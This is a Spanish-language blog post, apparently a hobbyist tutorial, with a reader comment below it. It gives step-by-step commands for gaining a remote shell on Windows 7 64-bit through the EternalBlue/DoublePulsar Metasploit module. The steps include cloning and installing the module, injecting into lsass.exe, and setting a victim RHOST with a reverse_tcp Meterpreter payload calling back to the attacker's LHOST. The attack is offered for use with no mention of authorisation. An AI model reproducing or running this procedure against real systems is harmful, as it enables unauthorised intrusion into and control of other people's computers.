Advertisement

header ads

ACCESO A WINDOWS 7 con Eternalblue DESDE Metasploit CON KALI LINUX

Hoy me he tomado un tiempo para jugar con mi consola, aunque para ser sincero no quería tocar nada sobre esto porque KALI LINUX no ha lanzado esto oficial, solo exploit-db.



Antes de empezar quisiera felicitar a “@UnaPibaGeek” por haber compartido esto. Simplemente te voy a contar mi experiencia sin haber leído el código completo (Luego me tomare un tiempo de leer todo el código).
Básicamente tienes una herramienta llamada Eternalblue que lo agregamos a metasploit para ejecutarla, funciona con Windows 7 o Windows Server 2008 para obtener una shell.
Pero estuve probando y con Windows 7 de 32bit ejecutaba el exploit pero nunca me lanzaba la shell. Puede ser de haber equivocado.

Ahora el método funciona con un Windows 64bits y un Kali Linux 64bits con un soporte o arquitectura de 32bits para wine.
sudo dpkg --add-architecture i386
apt-get install wine32
Tienes que desactivar los firewall, cuando lo tengas activado el exploit se va a reventar y no ejecutar.
Recuerda a Windows 7 64bits SP1, no necesitas instalar algo.
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Ahora descargamos la herramienta, observaron la URL, algunas personas me entenderán porque no quería bajarlo.
Ahora vamos a jugar.
cd Eternalblue-Doublepulsar-Metasploit
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
Lo que hicimos fue agregar el modulo a metasploit
service postgresql start
use exploit/windows/smb/eternalblue_doublepulsar
show options
set DOUBLEPULSARPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set PROCESSINJECT lsass.exe
lsass.exe es solo para windows de 64bits
set RHOST 192.168.1.11
Recuerda RHOST es la IP de tu victima.
set TARGETARCHITECTURE x64
set target 9
Agregamos target para windows 7
set PAYLOAD windows/x64/meterpreter/reverse_tcp
El PAYLOAD tiene que ser exclusivo para 64bits
set LHOST 192.168.1.5
Recuerda IP de tu maquina
Ahora ejecutar el exploit.
Ahora solo te queda que lo pruebes y te pongas a jugar. Recuerda que en 32bits el exploit ejecuta pero no explota.
Me hace recordar mucho la vulnerabilidad de windows XP ms08_06.
https://www.exploit-db.com/docs/41897.pdf (español)
https://www.exploit-db.com/docs/41896.pdf (inglés).
Listo, aunque esta para windows 2008, ña me quedo feliz con windows 7. No te olvides de compartirlo y darle mucho amigo. Gracias !

Publicar un comentario

3 Comentarios

  1. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  2. hola osea que no funciona mas en windows con arquitectura x86 solo funciona en windows x64?
    y otra cosa osea que si tengo un kali linux 32 bits con instalacion de wine 32bits no funciona...osea no llega la conexion meterpreter?
    osea tengo que instalar un kali linux de 64 bits con instalacion de wine32bits para que funcione y me llegue la conexion meterpreter

    por que ami me paso como a vos no me llegaba la conexion meterpreter en ningun windows 7 x86 ni en x64 y tengo instalado un kali linux 32 bits poreso te pregunto tengo que instalar kali linux 64 bits y gracias muy bueno tu pagina mucha informacion interesante

    ResponderEliminar